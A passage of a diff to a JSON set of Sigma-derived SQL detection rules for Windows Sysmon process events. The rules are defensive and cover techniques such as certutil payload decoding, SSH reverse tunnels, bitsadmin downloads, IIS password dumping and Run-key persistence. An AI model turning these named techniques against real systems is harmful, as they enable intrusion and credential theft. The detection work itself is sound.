ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Legitimate use" + "Administrative activity using a remote port forwarding to a local port" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Windows Processes Suspicious Parent Directory", - "id": "96036718-71cc-4027-a538-d1587e0006a7", - "status": "test", - "description": "Detect suspicious parent processes of well-known Windows processes", - "author": "vburov", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1036.003", - "attack.t1036.005" + "attack.t1564.004" ], "falsepositives": [ - "Some security products seem to spawn these" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsaiso.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\') AND NOT (((ParentImage LIKE '%\\\\SavService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\') AND ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (ParentImage = '' OR ParentImage = '-')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_proc_wrong_parent.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "A General detection for sdclt spawning new processes. This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_certutil_decode.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.defense_evasion", - "attack.t1036.007" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%.doc.lnk' ESCAPE '\\' OR ParentImage LIKE '%.docx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xls.lnk' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentImage LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentImage LIKE '%.txt.lnk' ESCAPE '\\' OR ParentImage LIKE '%.doc.js' ESCAPE '\\' OR ParentImage LIKE '%.docx.js' ESCAPE '\\' OR ParentImage LIKE '%.xls.js' ESCAPE '\\' OR ParentImage LIKE '%.xlsx.js' ESCAPE '\\' OR ParentImage LIKE '%.ppt.js' ESCAPE '\\' OR ParentImage LIKE '%.pptx.js' ESCAPE '\\' OR ParentImage LIKE '%.rtf.js' ESCAPE '\\' OR ParentImage LIKE '%.pdf.js' ESCAPE '\\' OR ParentImage LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", + "attack.persistence", "attack.defense_evasion", - "attack.t1218", - "attack.t1105" + "attack.t1542.001" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Set Files as System Files Using Attrib.EXE", - "id": "bb19e94c-59ae-4c15-8c12-c563d23fe52b", - "status": "experimental", - "description": "Detects the execution of \"attrib\" with the \"+s\" flag to mark files as system files", - "author": "frack113", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", + "status": "test", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.t1564.001" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_attrib_system.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", - "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR Image LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Change Default File Association Via Assoc", - "id": "3d3aa6cd-6272-44d6-8afc-7e88dfef7061", - "status": "test", - "description": "Detects file association changes using the builtin \"assoc\" command.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Timur Zinniatullin, oscd.community", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.001" + "attack.defense_evasion" ], "falsepositives": [ - "Admin activity" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%assoc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_assoc_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Fsutil Drive Enumeration", - "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "status": "experimental", - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.discovery", - "attack.t1120" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Certain software or administrative tasks may trigger false positives." + "Legitimate usage of stordiag.exe." ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fsutil_drive_enumeration.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", - "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate administrator sets up autorun keys for legitimate reasons.", + "Discord" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", + "status": "test", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE 